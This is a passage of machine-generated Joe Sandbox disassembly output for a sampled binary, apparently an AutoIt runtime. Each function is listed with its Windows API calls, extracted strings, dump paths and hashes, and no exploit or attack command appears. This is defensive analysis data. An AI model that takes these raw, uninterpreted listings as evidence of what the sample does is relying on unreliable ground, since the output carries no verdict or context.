                                        • Opcode Fuzzy Hash: 31c8101800617a574736322b6fce96056730a70a86d8ee842835f9cd00645379
                                        • Instruction Fuzzy Hash: 9991C172504701AFDB26EB50D991F9BB3E8AF84310F04885DF5499F292EB34FA44CB92
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0038E3BB
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00389615,?), ref: 0038E417
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0038E457
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0038E49C
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0038E4D3
                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,00389615,?), ref: 0038E4DF
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0038E4EF
                                        • DestroyCursor.USER32(?), ref: 0038E4FE
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0038E51B
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0038E527
                                          • Part of subcall function 00341BC7: __wcsicmp_l.LIBCMT ref: 00341C50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                        • String ID: .dll$.exe$.icl$@U=u
                                        • API String ID: 3907162815-1639919054
                                        • Opcode ID: d7272cef8b64680c1df5c63c10c977b5ed66ab0bbd713b6b2cf9ceb35509e393
                                        • Instruction ID: 518e0268d8ac9e92307201afae74faedbbb66079743b5fa1adf99f71029396a5
                                        • Opcode Fuzzy Hash: d7272cef8b64680c1df5c63c10c977b5ed66ab0bbd713b6b2cf9ceb35509e393
                                        • Instruction Fuzzy Hash: 4361DD71600715BBEB16EF64CC46FBA77ACAB09710F104145F915EB0D0EBB4E980C7A0
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 0036B46D
                                        • VariantCopy.OLEAUT32(?,?), ref: 0036B476
                                        • VariantClear.OLEAUT32(?), ref: 0036B482
                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0036B561
                                        • __swprintf.LIBCMT ref: 0036B591
                                        • VarR8FromDec.OLEAUT32(?,?), ref: 0036B5BD
                                        • VariantInit.OLEAUT32(?), ref: 0036B63F
                                        • SysFreeString.OLEAUT32(00000016), ref: 0036B6D1
                                        • VariantClear.OLEAUT32(?), ref: 0036B727
                                        • VariantClear.OLEAUT32(?), ref: 0036B736
                                        • VariantInit.OLEAUT32(00000000), ref: 0036B772
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                        • API String ID: 3730832054-3931177956
                                        • Opcode ID: cd31edee6883e777cf485ba765546560125384146c7459173bd1f2f5df98708b
                                        • Instruction ID: f50894b73c71b600d96d1a0fbc90e2f669cff85f029e6bc52ad0c013adf83b7f
                                        • Opcode Fuzzy Hash: cd31edee6883e777cf485ba765546560125384146c7459173bd1f2f5df98708b
                                        • Instruction Fuzzy Hash: 79C1AF71A04615DBCB23AF66D484B69F7B8BF06300F15C465E409DB98ADB74EC80DFA1
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00370EFF
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00370F0F
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00370F1B
                                        • __wsplitpath.LIBCMT ref: 00370F79
                                        • _wcscat.LIBCMT ref: 00370F91
                                        • _wcscat.LIBCMT ref: 00370FA3
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00370FB8
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00370FCC
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00370FFE
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0037101F
                                        • _wcscpy.LIBCMT ref: 0037102B
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0037106A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                        • String ID: *.*
                                        • API String ID: 3566783562-438819550
                                        • Opcode ID: 3b7fe1d7183da5ac3ddfaeb5154992d1a31304fdfd75abbcd9f6f82aaf770c15
                                        • Instruction ID: ee6f832a0bcaa3383736ab7f30b0e848486b9983db9ca9b9bf082ca67b6ea14a
                                        • Opcode Fuzzy Hash: 3b7fe1d7183da5ac3ddfaeb5154992d1a31304fdfd75abbcd9f6f82aaf770c15
                                        • Instruction Fuzzy Hash: 7A616DB25047059FD721EF24C844A9FB3E8FF89310F04891EF9899B251EB35EA45CB92
                                        APIs
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • CharLowerBuffW.USER32(?,?), ref: 0036DB26
                                        • GetDriveTypeW.KERNEL32 ref: 0036DB73
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0036DBBB
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0036DBF2
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0036DC20
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                        • API String ID: 2698844021-4113822522
                                        • Opcode ID: eb24833d99f71f342c692521575ba0edd153f836044d27e6d1b41d0fdca2caea
                                        • Instruction ID: ee9b0e02afdfecba6c35d23c7539667b0924da1687cb62e26db14db98ea6babe
                                        • Opcode Fuzzy Hash: eb24833d99f71f342c692521575ba0edd153f836044d27e6d1b41d0fdca2caea
                                        • Instruction Fuzzy Hash: 67516C726047159FC706EF10D89196AB7E8FF88758F00886DF8969B261DB31EE05CB92
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00394085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00363145
                                        • LoadStringW.USER32(00000000,?,00394085,00000016), ref: 0036314E
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00394085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00363170
                                        • LoadStringW.USER32(00000000,?,00394085,00000016), ref: 00363173
                                        • __swprintf.LIBCMT ref: 003631B3
                                        • __swprintf.LIBCMT ref: 003631C5
                                        • _wprintf.LIBCMT ref: 0036326C
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00363283
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                        • API String ID: 984253442-2268648507
                                        • Opcode ID: bf698b46f921a24cc527e1b3716455a5f714fbf68d0e4717dc54f9f0aa245253
                                        • Instruction ID: 3d481f5dd47f9dd6f43bd97ea9c829feaaa75c0469151b55dec3a16f24cf562f
                                        • Opcode Fuzzy Hash: bf698b46f921a24cc527e1b3716455a5f714fbf68d0e4717dc54f9f0aa245253
                                        • Instruction Fuzzy Hash: C2414472900219A6CB16FB90ED97EEFB77CAF15700F504465F201B60A2EE756F44CAA1
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0036D96C
                                        • __swprintf.LIBCMT ref: 0036D98E
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0036D9CB
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0036D9F0
                                        • _memset.LIBCMT ref: 0036DA0F
                                        • _wcsncpy.LIBCMT ref: 0036DA4B
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0036DA80
                                        • CloseHandle.KERNEL32(00000000), ref: 0036DA8B
                                        • RemoveDirectoryW.KERNEL32(?), ref: 0036DA94
                                        • CloseHandle.KERNEL32(00000000), ref: 0036DA9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                        • String ID: :$\$\??\%s
                                        • API String ID: 2733774712-3457252023
                                        • Opcode ID: 59721acbd202b839125acd0be71875af27bd758702c6484e141a2539de15f2b6
                                        • Instruction ID: cec7dfcb180bdfd35baab96f2fcb2f09edef82a6aae818b6dce801460eeda8a8
                                        • Opcode Fuzzy Hash: 59721acbd202b839125acd0be71875af27bd758702c6484e141a2539de15f2b6
                                        • Instruction Fuzzy Hash: 2231A676A00208AADB22DFA4DC49FDA77FDBF89700F1481A5F519D6061E770DA81CBA1
                                        APIs
                                        • __wsplitpath.LIBCMT ref: 00370C93
                                        • _wcscat.LIBCMT ref: 00370CAB
                                        • _wcscat.LIBCMT ref: 00370CBD
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00370CD2
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00370CE6
                                        • GetFileAttributesW.KERNEL32(?), ref: 00370CFE
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00370D18
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00370D2A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                        • String ID: *.*
                                        • API String ID: 34673085-438819550
                                        • Opcode ID: 1a2d4fb65938ab5a4fd3414b85d1fcf8ab8e6d0b1066c07eaeedfc42206c94d9
                                        • Instruction ID: a980f3d16e58a08a4602b1e92e177f947ae546ffc39d2f1dc89aec9571c3e4f4
                                        • Opcode Fuzzy Hash: 1a2d4fb65938ab5a4fd3414b85d1fcf8ab8e6d0b1066c07eaeedfc42206c94d9
                                        • Instruction Fuzzy Hash: BB81A8B1504305DFC77ADF64C8449AAB7E8AB89314F15C91EF489CB251E738ED84CB52
                                        APIs
                                          • Part of subcall function 0035B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0035B903
                                          • Part of subcall function 0035B8E7: GetLastError.KERNEL32(?,0035B3CB,?,?,?), ref: 0035B90D
                                          • Part of subcall function 0035B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0035B3CB,?,?,?), ref: 0035B91C
                                          • Part of subcall function 0035B8E7: RtlAllocateHeap.NTDLL(00000000,?,0035B3CB), ref: 0035B923
                                          • Part of subcall function 0035B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0035B93A
                                          • Part of subcall function 0035B982: GetProcessHeap.KERNEL32(00000008,0035B3E1,00000000,00000000,?,0035B3E1,?), ref: 0035B98E
                                          • Part of subcall function 0035B982: RtlAllocateHeap.NTDLL(00000000,?,0035B3E1), ref: 0035B995
                                          • Part of subcall function 0035B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0035B3E1,?), ref: 0035B9A6
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0035B5F7
                                        • _memset.LIBCMT ref: 0035B60C
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0035B62B
                                        • GetLengthSid.ADVAPI32(?), ref: 0035B63C
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0035B679
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0035B695
                                        • GetLengthSid.ADVAPI32(?), ref: 0035B6B2
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0035B6C1
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0035B6C8
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0035B6E9
                                        • CopySid.ADVAPI32(00000000), ref: 0035B6F0
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0035B721
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0035B747
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0035B75B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        • Opcode ID: a9a86fc3334d483713cea051804b8653778ff2ddd9be28343abe206f2ab400a3
                                        • Instruction ID: 27d96ea11a065a756acab243cb6268e08fbd62c7ce0b7f768a47c53c02353009
                                        • Opcode Fuzzy Hash: a9a86fc3334d483713cea051804b8653778ff2ddd9be28343abe206f2ab400a3
                                        • Instruction Fuzzy Hash: 85514C75900209ABDF02DFA4DC45EEEBB79FF49305F048159FD16AB2A0DB309A09CB60
                                        APIs
                                        • GetDC.USER32(00000000), ref: 0037A2DD
                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0037A2E9
                                        • CreateCompatibleDC.GDI32(?), ref: 0037A2F5
                                        • SelectObject.GDI32(00000000,?), ref: 0037A302
                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0037A356
                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0037A392
                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0037A3B6
                                        • SelectObject.GDI32(00000006,?), ref: 0037A3BE
                                        • DeleteObject.GDI32(?), ref: 0037A3C7
                                        • DeleteDC.GDI32(00000006), ref: 0037A3CE
                                        • ReleaseDC.USER32(00000000,?), ref: 0037A3D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: d6da3327b16b4921897a94111de8572cd9214fe5df30eff3e3ebd54d61c34f97
                                        • Instruction ID: c642d16d542505ffa5a9777eb0001aad4ef1a59a703ca2d0de37ce0d1e4b4a64
                                        • Opcode Fuzzy Hash: d6da3327b16b4921897a94111de8572cd9214fe5df30eff3e3ebd54d61c34f97
                                        • Instruction Fuzzy Hash: EC516B75A00709EFDB26CFA8DC84EAEBBB9EF49310F14841DF95AA7650C735A841CB50
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00382AA6,?,?), ref: 00383B0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E=
                                        • API String ID: 3964851224-2382786368
                                        • Opcode ID: 96417d1bb644b943008c1319fdaec44b029f3404eef4f84f18fa086d1a2f907b
                                        • Instruction ID: 666f6237ddbb54a795df2984be52fb93cda7b1eab8d6e719b07b06b7e831471b
                                        • Opcode Fuzzy Hash: 96417d1bb644b943008c1319fdaec44b029f3404eef4f84f18fa086d1a2f907b
                                        • Instruction Fuzzy Hash: 0E416B3910034A8FCF0BFF14E881AEA3365BF56750F5508A5ECA26F395DB709A0ACB51
                                        APIs
                                        • timeGetTime.WINMM ref: 0036809C
                                          • Part of subcall function 0033E3A5: timeGetTime.WINMM(?,753DB400,00396163), ref: 0033E3A9
                                        • Sleep.KERNEL32(0000000A), ref: 003680C8
                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 003680EC
                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0036810E
                                        • SetActiveWindow.USER32 ref: 0036812D
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0036813B
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0036815A
                                        • Sleep.KERNEL32(000000FA), ref: 00368165
                                        • IsWindow.USER32 ref: 00368171
                                        • EndDialog.USER32(00000000), ref: 00368182
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: @U=u$BUTTON
                                        • API String ID: 1194449130-2582809321
                                        • Opcode ID: 708cd1d01b03af826173d41b6737a2058f482ecbc2597096ca86b11e10ac63eb
                                        • Instruction ID: 4f80f3ef1e3594da59aaeb5aa890c00436c203724562f4e1dac9450927983bf7
                                        • Opcode Fuzzy Hash: 708cd1d01b03af826173d41b6737a2058f482ecbc2597096ca86b11e10ac63eb
                                        • Instruction Fuzzy Hash: 2D215EB0240244BFE7235B22ECCDA263B6EE71B388F458714F5128B6E5CB764D059A11
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00393C64,00000010,00000000,Bad directive syntax error,003BDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 003632D1
                                        • LoadStringW.USER32(00000000,?,00393C64,00000010), ref: 003632D8
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • _wprintf.LIBCMT ref: 00363309
                                        • __swprintf.LIBCMT ref: 0036332B
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00363395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$">
                                        • API String ID: 1506413516-1380894278
                                        • Opcode ID: 0aab2af6e7796e2e5ebfc7936b8f6aa91fb77505469f8f53329c53cba5b21c13
                                        • Instruction ID: ceafd0f249fa2b18e45a6e0b90161cb89326e21ee714eb261a8c48267408a307
                                        • Opcode Fuzzy Hash: 0aab2af6e7796e2e5ebfc7936b8f6aa91fb77505469f8f53329c53cba5b21c13
                                        • Instruction Fuzzy Hash: 0D217F36850229BBCF03EF90DC06EEE7779BF14700F004456F505A90A1EB75AB58DB91
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 0036D567
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 0036D589
                                        • __swprintf.LIBCMT ref: 0036D5DC
